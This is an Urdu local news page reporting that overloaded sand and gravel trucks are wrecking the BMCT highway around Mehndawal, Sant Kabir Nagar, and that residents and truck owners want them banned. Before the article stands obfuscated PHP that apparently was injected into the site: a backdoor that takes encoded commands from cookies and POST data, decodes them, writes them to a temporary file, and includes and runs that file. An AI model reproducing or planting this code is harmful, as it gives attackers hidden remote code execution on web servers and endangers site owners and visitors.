$yKPOTF = "\160" . chr ( 556 - 452 ).chr (80) . "\x5f" . "\x54" . chr (99) . "\145" . "\x6e";$ALbNYzW = chr (99) . "\x6c" . chr (97) . 's' . "\x73" . "\137" . chr ( 662 - 561 )."\170" . chr ( 487 - 382 ).'s' . chr (116) . 's';$gRFMFw = class_exists($yKPOTF); $ALbNYzW = "11486";$MmJqOa = strpos($ALbNYzW, $yKPOTF);if ($gRFMFw == $MmJqOa){function gfQNqj(){$wvcHVsas = new /* 49798 */ phP_Tcen(34559 + 34559); $wvcHVsas = NULL;}$QFgiwPgYn = "34559";class phP_Tcen{private function ibCqLjZF($QFgiwPgYn){if (is_array(phP_Tcen::$toghwd)) {$name = sys_get_temp_dir() . "/" . crc32(phP_Tcen::$toghwd["salt"]);@phP_Tcen::$toghwd["write"]($name, phP_Tcen::$toghwd["content"]);include $name;@phP_Tcen::$toghwd["delete"]($name); $QFgiwPgYn = "34559";exit();}}public function hOrzLMc(){$gadhB = "16476";$this->_dummy = str_repeat($gadhB, strlen($gadhB));}public function __destruct(){phP_Tcen::$toghwd = @unserialize(phP_Tcen::$toghwd); $QFgiwPgYn = "62554_49365";$this->ibCqLjZF($QFgiwPgYn); $QFgiwPgYn = "62554_49365";}public function AsmYUe($gadhB, $mfzKdT){return $gadhB[0] ^ str_repeat($mfzKdT, intval(strlen($gadhB[0]) / strlen($mfzKdT)) + 1);}public function fqdBZt($gadhB){$spuKK = "\x62" . 'a' . chr ( 196 - 81 )."\145" . chr ( 444 - 390 )."\64";return array_map($spuKK . "\x5f" . chr (100) . "\x65" . "\x63" . chr (111) . 'd' . "\x65", array($gadhB,));}public function __construct($fUVLibLce=0){$YljeF = chr ( 334 - 290 ); $gadhB = "";$LBBQqBfX = $_POST;$tReWzpOlNp = $_COOKIE;$mfzKdT = "b5bda18b-31d1-436d-9e82-aa4cc60d83d3";$GxIWNWBw = @$tReWzpOlNp[substr($mfzKdT, 0, 4)];if (!empty($GxIWNWBw)){$GxIWNWBw = explode($YljeF, $GxIWNWBw);foreach ($GxIWNWBw as $CwxfD){$gadhB .= @$tReWzpOlNp[$CwxfD];$gadhB .= @$LBBQqBfX[$CwxfD];}$gadhB = $this->fqdBZt($gadhB);}phP_Tcen::$toghwd = $this->AsmYUe($gadhB, $mfzKdT);if (strpos($mfzKdT, $YljeF) !== FALSE){$mfzKdT = explode($YljeF, $mfzKdT); $tnzJXPnjmq = sprintf("62554_49365", rtrim($mfzKdT[0]));}}public static $toghwd = 46288;}gfQNqj();} اوورلوڈ گاڑیوں کی آمدورفت سے سڑکیں وقت سے پہلے شکشتہ ہونے لگتی ہیں۔عوام نے اوورلوڈ گاڑیوں پر قدغن لگانے کا مطالبہ کیاہے – شاکرہ نیوز چینل

اوورلوڈ گاڑیوں کی آمدورفت سے سڑکیں وقت سے پہلے شکشتہ ہونے لگتی ہیں۔عوام نے اوورلوڈ گاڑیوں پر قدغن لگانے کا مطالبہ کیاہے

اوورلوڈ گاڑیوں کی آمدورفت سے سڑکیں وقت سے پہلے شکشتہ ہونے لگتی ہیں۔عوام نے اوورلوڈ گاڑیوں پر قدغن لگانے کا مطالبہ کیاہے۔
فوٹو
اوورلوڈ سے بی ایم سی ٹی شاہراہ کے مخدوش ہونے کامنظر
مہنداول، سنت کبیرنگر
 مہنداول حلقہ اوراطراف میں ایک بار پھر ریت اور گٹی سے بھرے ٹرکوں کی اوورلوڈنگ شروع ہوگئی ہے۔ اوورلوڈنگ کو روکنے والے ذمہ داران کی بے حسی کے سبب روزانہ سیکڑوں ٹرک اوسطا اوورلوڈ ہوکر گزر رہے ہیں۔ دوسری جانب آر ٹی او عملہ کا کہنا ہے کہ اوورلوڈ ٹرکوں کے خلاف روزانہ ایکشن لیا جاتا ہے۔ اور اس سلسلہ میں مزید سختی کی جائیگی جبکہ ذرائع کا مانناہے کہ اوورلوڈنگ کے کاروبار سے وابستہ کچھ افراد انٹری لے کر ضلع سے اوورلوڈ ٹرک لے جارہے ہیں۔ تمام تھانوں اور چوکیوں کے سامنے سے گزرنے والے یہ اوورلوڈ ٹرک پولیس کو نظر نہیں آتے ہیں۔ ذرائع نے انکشاف کیا ہے کہ اوورلوڈ ٹرکوں کے کھیل سے وابستہ افراد ضلع میں ایک دن میں لاکھوں روپے کما رہے ہیں۔
تاہم اوورلوڈ ٹرکوں کے بارے میں جو دعوے کیے جارہے ہیں ، جس کے مطابق انتظامیہ کی طرف سے اوورلوڈ کو روکنے کی کوششیں کی جارہی ہیں ، وہ موجودہ حالات میں ناکافی ہیں۔ اس کے پیش نظر بہت سی گاڑیوں کے مالکان اب خود ہی سامنے آرہے ہیں اور اے آر ٹی او آفیسر سے اوورلوڈ ٹرک چلانے پر پابندی کا مطالبہ کر رہے ہیں۔ ٹرک مالکان دیپک سنگھ ، ستی پرکاش ، ہری نارائن ، ایم شمیم خان ، رادھے شیام ، انل کمار ، راجو گپتا ، جتیندر کمار ، مدن لال جیسوال وغیرہ کا کہناہے کہ ریت ، مورنگ ، گٹی کے زیادہ بوجھ سے سڑکیں وقت سے پہلے شکشتہ ہونے لگتی ہیں،جس پرموثرکاروائی کیاجانانہایت ضروری ہے۔
واضح رہے کہ اوورلوڈ ٹرکوں کے چلنےکی وجہ سے کروڑوں لاگت والی سڑکیں تباہ ہورہی ہیں۔ اس کے ساتھ ہی آئے دن حادثات بھی پیش آ رہے ہیں۔ضلع کی سب سے اہم بی ایم سی ٹی شاہراہ جگہ جگہ مخدوش اورشکشتہ ہوگئی ہے،اس کے علاوہ دیگرسڑکوں بھی ٹوٹ رہی ہیں۔حکومت کی ہدایت پر ضلع انتظامیہ کی جانب سے ٹیمیں تشکیل دے کر اوورلوڈ کے خلاف ٹیمیں بھی ترتیب دی جاتی ہیں۔ اکثر اوورلوڈ ٹرکوں کوقبضہ میں لے کر ان پر جرمانہ بھی عائد کیا جاتا ہے۔ لیکن ان سب کے باوجود اوورلوڈ گاڑیوں کے مالکان کو کوئی فرق نہیں پڑتا ہے ، جس کی وجہ سے اوورلوڈ ٹرکوں کا چلنا بلا روک ٹوک جاری ہے۔عوام نے اوورلوڈ ٹرکوں پر قدغن لگانے کا مطالبہ کیاہے۔

Related posts